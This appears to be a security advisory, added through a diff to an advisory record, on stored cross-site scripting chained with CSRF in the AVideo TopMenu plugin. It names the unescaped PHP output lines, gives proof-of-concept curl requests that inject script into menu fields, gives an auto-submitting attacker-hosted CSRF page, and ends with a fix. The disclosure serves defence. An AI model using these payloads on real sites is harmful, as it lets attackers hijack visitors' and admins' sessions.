+ "details": "## Summary\n\nThe TopMenu plugin renders menu item fields (icon classes, URLs, and text labels) directly into HTML without applying `htmlspecialchars()` or any other output encoding. Since menu items are rendered on every public page through plugin hooks, a single malicious menu entry results in stored cross-site scripting that executes for every visitor to the site. An admin user who is tricked into saving a crafted menu item (or an attacker who gains admin access) can compromise all site visitors.\n\n## Details\n\nMultiple output locations in the TopMenu plugin render user-controlled data without escaping:\n\nIn `HTMLMenuRight.php:24`, the icon class is injected directly:\n\n```php\n<i class=\"<?php echo $value2['icon'] ?>\"></i>\n```\n\nIn `HTMLMenuRight.php:40`, the URL is rendered without encoding:\n\n```php\n<a href=\"<?php echo $value2['finalURL']; ?>\">\n```\n\nIn `HTMLMenuLeft.php:32`, same pattern for the left menu:\n\n```php\n<a href=\"<?php echo $value2['finalURL']; ?>\">\n```\n\nIn `index.php:49`, the menu item text is echoed raw:\n\n```php\n<?php echo $menuItem->getText(); ?>\n```\n\nMenu item data is saved via `menuItemSave.json.php` with no sanitization in the setter methods. The stored values are loaded from the database and rendered on every page because the TopMenu plugin hooks into the global page layout.\n\nCritically, `menuItemSave.json.php` has no CSRF protection. It checks `User::isAdmin()` but does not call `isGlobalTokenValid()` or perform any other CSRF token validation. This means the stored XSS can be chained with CSRF: an attacker does not need a compromised admin account. Instead, a cross-origin POST from an attacker-controlled page can create the malicious menu item if an admin visits the attacker's page while logged in.\n\n## Proof of Concept\n\n1. As an admin user, save a menu item with a malicious icon class:\n\n```bash\ncurl -b \"PHPSESSID=ADMIN_SESSION\" \\\n -X POST \"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\" \\\n -d 'icon=fa-home\" onmouseover=\"alert(document.cookie)&text=Home&url=/&status=a'\n```\n\n2. Alternatively, inject via the URL field to create a JavaScript link:\n\n```bash\ncurl -b \"PHPSESSID=ADMIN_SESSION\" \\\n -X POST \"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\" \\\n -d 'icon=fa-link&text=Click+Me&url=javascript:alert(document.cookie)&status=a'\n```\n\n3. Alternatively, inject via the text field:\n\n```bash\ncurl -b \"PHPSESSID=ADMIN_SESSION\" \\\n -X POST \"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\" \\\n -d 'icon=fa-home&text=<script>alert(document.cookie)</script>&url=/&status=a'\n```\n\n4. Alternatively, chain with CSRF (no admin account needed). Host this HTML on an attacker-controlled domain and lure an admin to visit it:\n\n```html\n<!DOCTYPE html>\n<html>\n<head><title>AVI-041 CSRF + Stored XSS PoC</title></head>\n<body>\n<h1>Loading...</h1>\n<iframe name=\"f1\" style=\"display:none\"></iframe>\n<form id=\"inject\" method=\"POST\" target=\"f1\"\n action=\"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\">\n <input type=\"hidden\" name=\"menuId\" value=\"1\" />\n <input type=\"hidden\" name=\"item_order\" value=\"99\" />\n <input type=\"hidden\" name=\"item_status\" value=\"a\" />\n <input type=\"hidden\" name=\"text\" value=\"<script>alert(document.cookie)</script>\" />\n <input type=\"hidden\" name=\"title\" value=\"Home\" />\n <input type=\"hidden\" name=\"url\" value=\"/\" />\n <input type=\"hidden\" name=\"icon\" value=\"fa-home\" />\n <input type=\"hidden\" name=\"menuSeoUrlItem\" value=\"\" />\n</form>\n<script>document.getElementById('inject').submit();</script>\n</body>\n</html>\n```\n\nThe cross-origin POST creates the malicious menu item because `menuItemSave.json.php` has no CSRF token validation.\n\n5. Visit any page on the AVideo instance:\n\n```bash\ncurl \"https://your-avideo-instance.com/\"\n```\n\n6. The injected JavaScript executes in the context of every visitor's browser session because the menu is rendered on all pages.\n\n## Impact\n\nStored cross-site scripting on every page of the AVideo instance. An attacker can steal session cookies, redirect users to phishing pages, modify page content, or perform actions on behalf of authenticated users (including admins). Because the menu renders globally, a single injection point compromises all visitors to the site.\n\n## Recommended Fix\n\nApply `htmlspecialchars()` with `ENT_QUOTES` to all outputs of `$value2['finalURL']`, `$value2['icon']`, and `$menuItem->getText()` in the TopMenu plugin templates:\n\n```php\n// HTMLMenuRight.php:24\n<i class=\"<?php echo htmlspecialchars($value2['icon'], ENT_QUOTES, 'UTF-8'); ?>\"></i>\n\n// HTMLMenuRight.php:40\n<a href=\"<?php echo htmlspecialchars($value2['finalURL'], ENT_QUOTES, 'UTF-8'); ?>\">\n\n// HTMLMenuLeft.php:32\n<a href=\"<?php echo htmlspecialchars($value2['finalURL'], ENT_QUOTES, 'UTF-8'); ?>\">\n\n// floatMenu.php - same pattern for any $value2['icon'] and $value2['finalURL'] outputs\n// index.php:49\n<?php echo htmlspecialchars($menuItem->getText(), ENT_QUOTES, 'UTF-8'); ?>\n```\n\nApply the same encoding to every location in `HTMLMenuRight.php`, `HTMLMenuLeft.php`, `floatMenu.php`, and `index.php` where these values are echoed into HTML.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
0 commit comments